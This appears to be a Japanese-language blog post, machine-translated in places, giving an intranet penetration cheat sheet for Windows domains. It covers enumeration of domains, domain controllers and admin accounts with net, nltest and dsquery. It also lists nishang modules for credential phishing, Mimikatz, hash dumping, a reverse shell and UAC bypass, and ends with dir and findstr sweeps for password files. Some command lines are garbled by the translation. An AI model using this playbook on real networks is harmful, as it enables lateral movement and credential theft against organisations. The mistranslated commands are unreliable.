技術共有

イントラネット セキュリティ: ドメイン内情報の検出

2024-07-12

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

1. ドメイン内の基本情報の収集

2.NETコマンド詳細説明

3. 主にイントラネットで利用されるドメイン収集方法

4. ドメイン コントローラーを見つける方法

5. ドメイン内のユーザーの基本情報を照会します。

6. ドメイン管理の位置付け

7.Powershell コマンドと機密情報の検索







1. ドメイン内の基本情報の収集:

4 つの状況:

1. ローカルユーザー: ユーザー

2. ローカル管理者ユーザー: ホーム バージョンでは無効、サーバーでのみ使用可能

3. ドメイン内のユーザー

4. ドメイン管理者

一般のローカルユーザーはドメイン情報を取得できません

ローカル管理者ユーザーは、自分の権限をシステム ユーザー (ドメイン内のユーザー) に直接昇格し、ドメイン内の情報を取得できます。

1. ドメインが存在するかどうかを確認します。

1. ドメインを確認します: ipconfig/all、systeminfo、または net config workstation

ipconfig /all: 見つかったドメイン: hack.com

systeminfo: 見つかったドメイン: hack.com

2. ドメインの DNS ホストを表示します: nslookup ドメイン名 (hack.com)

3.ネットタイム/ドメインの3つの状況

ドメインは存在しますが、現在のユーザーはドメイン ユーザーではありません

ドメインが存在し、現在のユーザーがドメイン ユーザーである

現在のネットワーク環境はワークグループであり、ドメインが存在しません

2.NET コマンドの詳細:

1.net view: ドメイン一覧、コンピュータ一覧、指定したコンピュータの共有リソースを表示: net view (コンピュータの一覧を表示) net view \computer (指定した共有コンピュータの表示)

net view /domain:ドメイン名 (ハック) (コンピュータのリストを表示)

2.ローカル ユーザーを表示するには net user: ドメイン内のユーザー数を表示するには net user /domain

ユーザーの追加: net ユーザー名 (admin) パスワード (123)/add

3.net 使用: コンピュータを接続するか、共有リソースからコンピュータを切断し、コンピュータの接続情報を表示します。

4.net time: 時間を使用してコンピュータまたはドメインを同期します: net time \computer net time /domain

5.net start: サービスを開始するか、開始されたサービスを表示します: net start service

6.netポーズ:実行中のサービスを一時停止します:ネットポーズサービス

7.net continue: サービスを再アクティブ化します: net continue service

8.net stop: Windows NT/2000/2003 サービスを停止します: net stop サービス

9.net share: 共有リソースの削除、作成、または表示

10.net session: ローカル コンピュータとそれに接続されているクライアントのセッションを一覧表示するか、切断します。

net session //computer (リストされるかセッション化されるコンピュータを識別します)

net session //computer delete (指定したコンピュータのセッションを切断します)

11.net localgroup コンピュータ グループの表示 (ローカルにのみ適用): net localgroup ユーザー名

ドメインユーザー: net localgroup ユーザー名/ドメイン

12.net group は、ドメイン内のグループの名前をクエリします (ドメイン コントローラーにのみ適用されます): net group /domain

13.net config は、現在実行中の構成可能なサービスを表示するか、サービスの構成を (ローカルで) 表示および変更します。

net config (実行中のサービスを表示) net config services (サービスのリストを表示)

14.net コンピュータ ドメイン データベースからコンピュータを追加または削除します。

net コンピュータ \コンピュータ名 /add または /del (ログイン ドメインへのコンピュータの追加または削除)

3. 主にイントラネットで利用されるドメイン収集方法

「このワークグループのサーバー リストは現在利用できません」と表示された場合は、サーバー、ワークステーション、コンピューターのブラウザーのサービスを有効にし、ファイアウォールを閉じます。

ドメインの表示: ipconfig/all、systeminfo、または net config workstation

ドメインの DNS ホストを表示します: nslookup ドメイン名 (hack.com)

クエリドメイン: net view /domain

ドメイン内のすべてのコンピュータをクエリします: net view /domain:ドメイン名

ドメイン内のすべてのユーザー グループのリストをクエリします: net group /domain

すべてのドメイン メンバーのコンピュータ リストをクエリします: net group "domain Computers" /domain

ドメイン内のパスワード情報を照会します: net accounts /domain

ドメインの信頼情報を取得します: nltest /domain_trusts

4. ドメイン コントローラーを見つける方法

ドメイン コントローラー名を表示します: nltest /DCLIST:hack

マシン名を表示し、IP を見つけます。ping/nslookup: ping/nslookup ドメイン コントローラー名

ここで ping が無効になる場合があります。

ドメイン コントローラーのホスト名を表示: nslookup ‐type=SRV _ldap._tcp

現在時刻を確認します: net time /domain

ドメイン コントローラー グループを表示します: net group "Domain Controllers" /domain

5. ドメイン内のユーザーの基本情報を照会します。

1. ドメイン内のユーザー情報をクエリします: net user /domain

2. ローカル ユーザーの表示: wmic useraccount get name ドメイン ユーザー: wmic useraccount get domain,name

ローカルユーザー:

ドメインユーザー:

3. 既存のユーザーを確認します: dsquery ユーザー (場合によっては実行されず、サーバー マシン上でのみ実行できる場合があります)

4. ローカル管理者のユーザー グループをクエリします: net localgroupAdministrators

5. ドメイン管理者ユーザーをクエリします: net group "domain admins" /domain

6. ドメイン管理者のユーザー グループをクエリします: net group "Enterprise Admins" /domain

6. ドメイン管理の位置付け

ここでは 2 つのツールが必要です

まずツールをサーバーにアップロードしてから実行します

1.PVEFindADUser: PVEFindADUser.exe -current (パスに注意してください) このツールは、どのユーザーがコンピュータにログインしているかを確認し、ドメイン管理者を見つけることができます。

2.powerView スクリプト:

powershell.exe ‐exec bypass ‐command "& { import‐module .PowerView.ps1;Invoke‐UserHunter}"

7.Powershell コマンドと機密情報の検索

最初にアクセス許可を確認します: Get-ExecutionPolicy

実行ポリシーを変更します: Set-ExecutionPolicy Unrestricted (無制限のアクセス許可のみが pow を実行できます)

nishang ツール (前の記事にダウンロード リンクがあります):

CS ディレクトリに配置した後、直接インポートします: powershell-import nishang/nishang.psm1

実行:powershellコマンド

よく使用されるいくつかのコマンド:

Check-VM: ホストが仮想マシンであるかどうかを確認します。

Invoke-CredentialsPhish: ユーザーをだましてパスワードを入力させます

Get-WLAN-Keys: Wi-Fi 情報

Invoke-Mimikatz: パスワードをキャッチする

Get-PassHashes: ハッシュを取得します。

Get-PassHints: ユーザーのパスワードヒント情報を取得します。

Invoke-PowerShellTcp: リバウンド シェル

Invoke-PsUACme: UAC をバイパスする

削除-更新: パッチを削除します。

Get-Information: ローカル情報

例: powershell チェック VM

機密データの場所を見つける:

1. さまざまな機密ファイルを指定されたディレクトリに収集します

dir /a /s /bd:"*.txt"

dir /a /s /b C:"*.xlsx"

dir /a /s /bd:"*.md"

dir /a /s /bd:"*.sql"

dir /a /s /bd:"*.pdf"

dir /a /s /bd:"*.docx"

dir /a /s /bd:"*.doc"

dir /a /s /bd:"*conf*"

dir /a /s /bd:"*戻る*"

dir /a /s /bd:"*パスワード*"

dir /a /s /bd:"*pass*"

dir /a /s /bd:"*ログイン*"

dir /a /s /bd:"*ユーザー*"

2. 指定したディレクトリ内のファイルからさまざまなアカウントのパスワードを収集します

findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si ユーザパスワード *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si ログイン *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si ユーザー *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

例: dir /a /s /bd:"*.txt"